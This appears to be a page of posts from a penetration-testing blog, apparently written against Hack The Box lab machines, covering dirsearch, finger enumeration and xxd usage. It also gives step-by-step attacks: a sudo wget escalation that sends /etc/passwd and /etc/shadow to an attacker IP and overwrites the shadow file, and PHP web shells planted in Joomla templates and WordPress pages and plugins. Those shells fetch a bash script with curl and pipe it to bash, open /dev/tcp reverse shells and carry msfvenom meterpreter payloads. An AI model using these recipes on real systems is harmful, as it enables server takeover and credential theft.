VK9 Security

dirsearch how to

by | Feb 20, 2020 | Tools

dirsearch is a simple command line tool designed to brute force directories and files in websites.

https://github.com/maurosoria/dirsearch

Installation

1. Download the source code

  • git clone https://github.com/maurosoria/dirsearch.git
  • ls
  • cd dirsearch/
  • ls

2. To execute the program

  • ./dirsearch.py
  • python3 dirsearch.py

How to use

1. Display the help menu

  • ./dirsearch.py –help

Search

-w = Customize wordlist (separated by comma)

-e = Extension list separated by comma (Example: php,asp)

-u = URL to scan

  • ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -u http://bank.htb

2. Using a list of URLs use -L

  • ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -L url_list.txt

3. Using predefined list of extensions

-E = Use predefined list of common extensions

  • ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

4. Enable recursion and for extensions

-f = Force extensions for every wordlist entry

-r = Bruteforce recursively

  • ./dirsearch.py -rf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

Set the level of recursion

-R = Max recursion level (subdirs) (Default: 1 [only rootdir + 1 dir])

  • ./dirsearch.py -r -R 3 -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

5. Increasing the number of threats (not recommended)

-t = Number of Threads

  • ./dirsearch.py -rf -t 5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

6. Excluding status code

-x = Exclude status code, separated by comma (example: 301, 500)

  • ./dirsearch.py -rf -x 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

7. Set a cookie, and send the requests to BurpSuite

–proxy=127.0.0.1:8080 = Http Proxy (example: localhost:8080)

-c = Set a cookie

  • ./dirsearch.py -rf -c HTBBankAuth=cfj5qnhq8br2si58l7pm9q5j56 –proxy=127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

8. Spoofing User-Agent

–ua = User agent text

  • ./dirsearch.py -rf –ua=”Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1″ –proxy=127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

9. Use a different method for the scan

–http-method = Method to use, default: GET, possible also: HEAD;POST

  • ./dirsearch.py -rf –http-method=POST –proxy=127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

10. Follow redirects

-F = follow redirects

  • ./dirsearch.py -F -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

11. Writing results to a file

  • ./dirsearch.py –plain-text-report=result.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt
  • cat results.txt

wget – Privilege Escalation

by | Feb 15, 2020 | Linux Post-Exploitation

wget is a free utility for non-interactive download of files from the Web. It supports HTTP, HTTPS, and FTP protocols, as well as retrieval through HTTP proxies.

If you get access to use with root privileges it can be harmful.

  • sudo -l

Hacking steps

1. wget has the capability of reading local files and sending content over the network, having a netcat listener que can get the contents of sensitive files

Local machine

  • nc -lvp 80

Remote machine

  • sudo /usr/bin/wget –post-file=/etc/passwd 10.10.14.21

Running that command prints the file content to our netcat

2. Doing this trick with /etc/shadow can help us view the password hash. We can try to overwrite that.

We save the contents of the output in a file named shadow in the local machine

  • vi shadow
  • cat shadow

3. I will update the root line with the exiting hash of a known user sammy (which I already know the password), if you get to create a compatible hash you can use that one for this technique too.

root:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:14146::::::

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

4. Now download the file and write the output to /etc/shadow

Local machine

  • python -m SimpleHTTPServer 9999

Remote machine

-O = write output, as we have root privileges it will do

  • sudo wget 10.10.14.21:9999/shadow -O /etc/shadow

5. Read the /etc/shadow file in the remote machine and make sure it has been overwritten

Local machine

  • nc -lvp 80

Remote machine

  • sudo /usr/bin/wget –post-file=/etc/passwd 10.10.14.21

Output in netcat

The file has been updated. The root hash shows differently as it was at the beginning

6. Try elevating privileges

  • su –
  • password: cooldude!

 

79/tcp finger – Enumeration

by | Feb 15, 2020 | Active Gathering

Finger is primarily used to enumerate user information on the target system. It can also find out detailed information (if exists) such as full name, email address, phone number etc. of all its users.

Nmap result

finger-user-enum

finger-user-enum is a script used to enumerate users

https://github.com/pentestmonkey/finger-user-enum

Username guessing tool primarily for use against the default Solaris finger service.

Installation

  • git clone https://github.com/pentestmonkey/finger-user-enum.git
  • ls -l finger-user-enum

Using finger-user-enum

1. Displaying help

  • perl finger-user-enum.pl -h

2. enumerate a single user

-u = user

-t = host IP

  • perl finger-user-enum.pl -u root -t 10.10.10.76

We can see output of root user, it means the user exists (1 result). On the other hand, the screenshot below would show (0 results).

  • perl finger-user-enum.pl -u vry4n -t 10.10.10.76

3. Enumerate users using a list

  • perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

4. Using a list of IPs

  • perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -T IP_list.txt

5. Using another port than default 79

  • perl finger-user-enum.pl -p 8000 -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

6. Showing detailed output

  • perl finger-user-enum.pl -d -u root -t 10.10.10.76

Metasploit

1. Metasploit has a module for finger scan (auxiliary/scanner/finger/finger_users)

  • use auxiliary/scanner/finger/finger_users
  • show options
  • set RHOSTS 10.10.10.76
  • set USERS_FILE /usr/share/seclists/Usernames/Names/names.txt
  • exploit

Using finger

Finger is a tool used to enumerate users using port 79. Finger may be used to look up users on a remote machine. The format is to specify a user as “user@host”, or “@host”

1. Display man page for help

  • man finger

2. enumerate a known user. In this case root

  • finger -s root@10.10.10.76

3. Show the home directory of the user

  • finger -sl root@10.10.10.76

4. Preventing the -l option from displaying the contents of the “.plan”, “.project” and “.pgpkey” files.

  • finger -slp sammy@10.10.10.76

Using xxd Linux command

by | Feb 13, 2020 | Linux Commands

xxd creates a hex dump of a given file or standard input. It can also convert a hex dump back to its original binary form.

Usage

Displaying available options

  • xxd –help

  • man xxd

1. Converting a file to hex

  • cat vk9-file.txt
  • file vk9-file.txt

2. run xxd

  • xxd vk9-file.txt

3. Skipping lines, skipping the first line

  • xxd -s 0x10 vk9-file.txt

Omit the last line

  • xxd -s -0x10 vk9-file.txt

4. Set a limit length, print 10 bytes

  • xxd -l 0x10 vk9-file.txt

5. Set the number of hex columns to display

  • xxd -c 2 vk9-file.txt

6. Producing binary dump

  • xxd -b vk9-file.txt

7. Reverting from Hex

  • xxd vk9-file.txt > vk9.hex
  • cat vk9.hex
  • xxd -r vk9.hex

 

Reverse shell on any CMS

by | Feb 13, 2020 | Web Exploitation

This trick works on any CMS you access. In case, you get the credentials either by brute force, disclosure, etc. This example uses Joomla! CMS

Joomla Reverse shell

1. Having access to the account and being able to edit the template

  • Go to Extensions – Templates – Templates

2. Select the template to use, in this case “Protostar Details and Files”

  • Click on New File

  • Choose a file name: vk9-sec
  • Choose the extension: php

  • Click on Create

3. Create a PHP script to accept remote commands

  • <?php echo “Follow us.” ?>
  • <?php echo shell_exec($_GET[‘cmd’]); ?>
  • Click save

4. Locate the vk9-sec.php page, in our case it is under /templates/protostar/vk9-sec.php

5. We know the PHP file is working, now we will enter the GET request via URL using the variable ‘cmd’

  • http://10.10.10.150/templates/protostar/vk9-sec.php?cmd=whoami

6. Let’s execute a remote file with a netcat reverse shell

  • start a listener in Kali/Parrot

Create a file with the command

  • echo “bash -i >& /dev/tcp/10.10.14.4/4444 0>&1” > vk9_reverse.sh
  • cat vk9-reverse.sh

Establish a python web server to download the file from the remote server

  • python -m SimpleHTTPServer 9999

Now using the ‘cmd’ variable in vk9-sec.php download the vk9_reverse.sh file using curl

  • http://10.10.10.150/templates/protostar/vk9-sec.php?cmd=curl 10.10.14.4:9999/vk9_reverse.sh | bash

Looking at the listener, we get a remote connection

Python web server logs

Reverse shell WordPress & Metasploit

1. Having already an active session in WordPress to the admin page. We can edit the page source and inject code that can do literally anything when the page is executed.

  • Appearance -> Editor
  • I chose “index.php”

2. To test we can inject a simple PHP code, in index.php script. The page should show, the text, and perhaps the output of a bash command through ‘cmd’ variable

  • <?php echo “Vry4n” ?>
  • <?php echo shell_exec($_GET[‘cmd’]); ?>

3. Capturing the traffic with BurpSuite we will analyze the server responses

  • First picture, we will just see string in the source code ‘Vry4n’

  • The second time we will visit (http://192.168.0.17/0/index.php?cmd=id)

4. Knowing we can print stuff on screen and execute some commands. We can proceed with the reverse connection.

Reverse Shell

1. From the attacking machine, we will generate a payload using MSFVenom, this will be in PHP language as the site has many PHP scripts already coded

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.13 LPORT=443 -f raw

2. Copy this code to the editor in WordPress

3. Start a listener in Metasploit

  • sudo msfdb init
  • sudo msfconsole
  • use exploit/multi/handler
  • set payload php/meterpreter/reverse_tcp
  • set LHOST 192.168.0.13
  • set LPORT 443
  • exploit

4. Now execute the script by visiting /index.php in the browser

  • http://192.168.0.17/0/index.php

5. The connection should show up now in Metasploit listener

WordPress Plugin editor

Having already access to CMS admin console. You could modify a plugin code and inject whatever you want.

1. Go to Plugins – Editor

2. Locate the script, you want to modify and add. I’d use akismet, usually plugins are stored at /wp-content/plugins

  • <?php echo “Vry4n” ?>
  • <?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/192.168.0.13/443 0>&1′”); ?>

3. Now visit the plugin from the browser, as you can see, the string “Vry4n” displays as the first line echoes it

  • http://192.168.0.14/wp-content/plugins/akismet/akismet.php

4. We can now try a reverse shell. Start a netcat listener in your local machine

  • nc -lvp 443

5. As per the second line we requested a reverse shell, reload the page